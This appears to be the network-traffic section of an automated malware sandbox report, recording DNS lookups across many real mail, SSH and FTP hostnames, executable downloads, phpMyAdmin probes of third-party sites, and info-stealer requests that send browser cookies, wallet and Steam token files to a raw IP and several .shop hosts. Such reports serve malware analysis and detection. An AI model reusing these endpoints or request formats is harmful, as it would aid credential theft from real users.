                Source: unknownDNS traffic detected: query: vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.zuhauseplus.vodafone.de replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ftp.mw.redsa.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.steamcommunity.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.naukrigulf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: relay.ro.bongacams.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.servicossociais.caixa.gov.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.gitam.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.m.sellercenter.lazada.com.my replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.servicossociais.caixa.gov.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.ro.bongacams.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.milogin.michigan.gov replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: imap.loopex.io replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.casinocontroller.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknown Network traffic detected: HTTP traffic on port 2222 -> 63177
                Source: C:\Users\user\AppData\Local\Temp\572.exe DNS query: name: adf.ly
                Source: unknown Network traffic detected: DNS query count 404
                Source: unknown Network traffic detected: IP country count 17
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                    Date: Mon, 05 Feb 2024 11:12:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 7668707
                    Connection: keep-alive
                    Content-Description: File Transfer
                    Content-Disposition: attachment; filename=may.exe
                    Content-Transfer-Encoding: binary
                    Expires: 0
                    Cache-Control: must-revalidate
                    Pragma: public
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DDj5Jd8oE8KTt%2BYx3Q0bfwbun6txohwpNW9FRZFd1qsdYs726gbU%2Be4bAdZPDogNA9q07RDjCx%2FrCEi4ZTdVD%2FXVXxt4CbAQKi6zftp%2BQJN%2FQyMWyzOEbFx%2B5iDAFa2uJB%2B"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 850ab7ebff8506f2-ATL
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:31 GMT Content-Type: application/octet-stream Content-Length: 9104384 Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT Connection: keep-alive ETag: "65bd14a7-8aec00" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Mon, 05 Feb 2024 11:12:41 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=6f897021.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 05 Feb 2024 11:12:44 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Feb 2024 11:00:02 GMT ETag: "50000-610a05d0c651d" Accept-Ranges: bytes Content-Length: 327680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:50 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:56 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:57 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:58 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:12:59 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:13:03 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 05 Feb 2024 11:13:03 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG Host: 185.172.128.79 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------HDBGDHDAECBGDHJKFIDG Content-Disposition: form-data; name="hwid" 995A8DE32C70330045240 ------HDBGDHDAECBGDHJKFIDG Content-Disposition: form-data; name="build" default ------HDBGDHDAECBGDHJKFIDG--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCG Host: 185.172.128.79 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------FBFHJJJDAFBKEBGDGHCG Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------FBFHJJJDAFBKEBGDGHCG Content-Disposition: form-data; name="message" browsers ------FBFHJJJDAFBKEBGDGHCG--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.172.128.79Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"plugins------AECAECFCAAEBFHIEHDGH--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC Host: 185.172.128.79 Content-Length: 8087 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH Host: 185.172.128.79 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GIEHJKEBAAEBGCAAEBFH Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------GIEHJKEBAAEBGCAAEBFH Content-Disposition: form-data; name="file_name" Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0 ------GIEHJKEBAAEBGCAAEBFH Content-Disposition: form-data; name="file" [base64 data, truncated in the report]
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE Host: 185.172.128.79 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHDAAKJEGCFCAKEBKJJE Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------GHDAAKJEGCFCAKEBKJJE Content-Disposition: form-data; name="file_name" ZWltZWhydnpvZC5maWxl ------GHDAAKJEGCFCAKEBKJJE Content-Disposition: form-data; name="file" ------GHDAAKJEGCFCAKEBKJJE--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC Host: 185.172.128.79 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GCBFBGCGIJKJJKFIDBFC Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------GCBFBGCGIJKJJKFIDBFC Content-Disposition: form-data; name="file_name" ZWltZWhydnpvZC5maWxl ------GCBFBGCGIJKJJKFIDBFC Content-Disposition: form-data; name="file" ------GCBFBGCGIJKJJKFIDBFC--
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.79 Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF Host: 185.172.128.79 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG Host: 185.172.128.79 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIDHJKFBGIIJJKFIJDBG Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------IIDHJKFBGIIJJKFIJDBG Content-Disposition: form-data; name="message" wallets ------IIDHJKFBGIIJJKFIJDBG--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC Host: 185.172.128.79 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------BAKEBAFIIECBGCAAAAFC Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------BAKEBAFIIECBGCAAAAFC Content-Disposition: form-data; name="message" files ------BAKEBAFIIECBGCAAAAFC--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA Host: 185.172.128.79 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 185.172.128.79 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GCBGIIECGHCAKECAFBFH Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------GCBGIIECGHCAKECAFBFH Content-Disposition: form-data; name="file_name" c3RlYW1fdG9rZW5zLnR4dA== ------GCBGIIECGHCAKECAFBFH Content-Disposition: form-data; name="file" ------GCBGIIECGHCAKECAFBFH--
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB Host: 185.172.128.79 Content-Length: 142507 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE Host: 185.172.128.79 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JEBGCBAFCGDAAKFIDGIE Content-Disposition: form-data; name="token" 7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3 ------JEBGCBAFCGDAAKFIDGIE Content-Disposition: form-data; name="message" jbdtaijovg ------JEBGCBAFCGDAAKFIDGIE--
                Source: unknown FTP traffic detected: 54.71.181.160:21 -> 192.168.2.6:52159 220 BIENVENIDOS!
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resergvearyinitiani.shop
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gemcreedarticulateod.shop
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: secretionsuitcasenioise.shop
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: claimconcessionrebe.shop
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liabilityarrangemenyit.shop
                Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: liabilityarrangemenyit.shop
                Source: global traffic HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1 Host: naukrigulf.com Accept: */* Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: innovationdevelopment.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hero-wars.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
